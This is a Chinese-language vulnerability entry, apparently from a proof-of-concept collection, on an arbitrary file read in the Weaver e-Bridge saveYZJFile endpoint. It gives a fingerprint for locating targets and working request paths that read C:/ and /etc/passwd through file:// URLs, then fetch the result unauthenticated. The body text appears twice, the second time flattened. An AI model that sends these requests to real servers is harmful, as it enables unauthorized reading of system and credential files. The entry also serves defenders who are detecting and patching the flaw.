# WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞 ## 漏洞描述 Weaver云桥（e-Bridge）是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集...

WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞
======================================

漏洞描述
----

Weaver云桥（e-Bridge）是上海Weaver公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。Weaver云桥存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

影响版本
----

Weaver云桥 e-Bridge 2018-2019 多个版本

网络测绘
----

title="Weaver云桥e-Bridge"

漏洞复现
----

```php
# Windows验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
```

![img](https://shs3.b.qianxin.com/butian_public/f625154109864f1864f06f04948cab7ffd47eaec0d23e.jpg)

成功返回 `id值`,说明含有此漏洞

调用查看文件接口访问 /file/fileNoLogin/id值

![img](https://shs3.b.qianxin.com/butian_public/f7138754af0ed0d76d31a5019776eb9d958cb451d0e99.jpg)

```php
# Linux验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
```

![img](https://shs3.b.qianxin.com/butian_public/f231901ffb39602639398d7c0d657a3199e4534727350.jpg)

成功返回 `id值`,说明含有此漏洞

调用查看文件接口访问 `/file/fileNoLogin/id值`

![img](https://shs3.b.qianxin.com/butian_public/f403692d971df949e0eabb38dc3072ff8161956d1fb62.jpg)

WeaverOA E-Bridge saveYZJFile 任意文件读取漏洞

漏洞描述

Weaver云桥 e-Bridge 2018-2019 多个版本

title="Weaver云桥e-Bridge"

# Windows验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt

成功返回 id值,说明含有此漏洞

调用查看文件接口访问 /file/fileNoLogin/id值

# Linux验证POC

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

成功返回 id值,说明含有此漏洞

调用查看文件接口访问 /file/fileNoLogin/id值

站长统计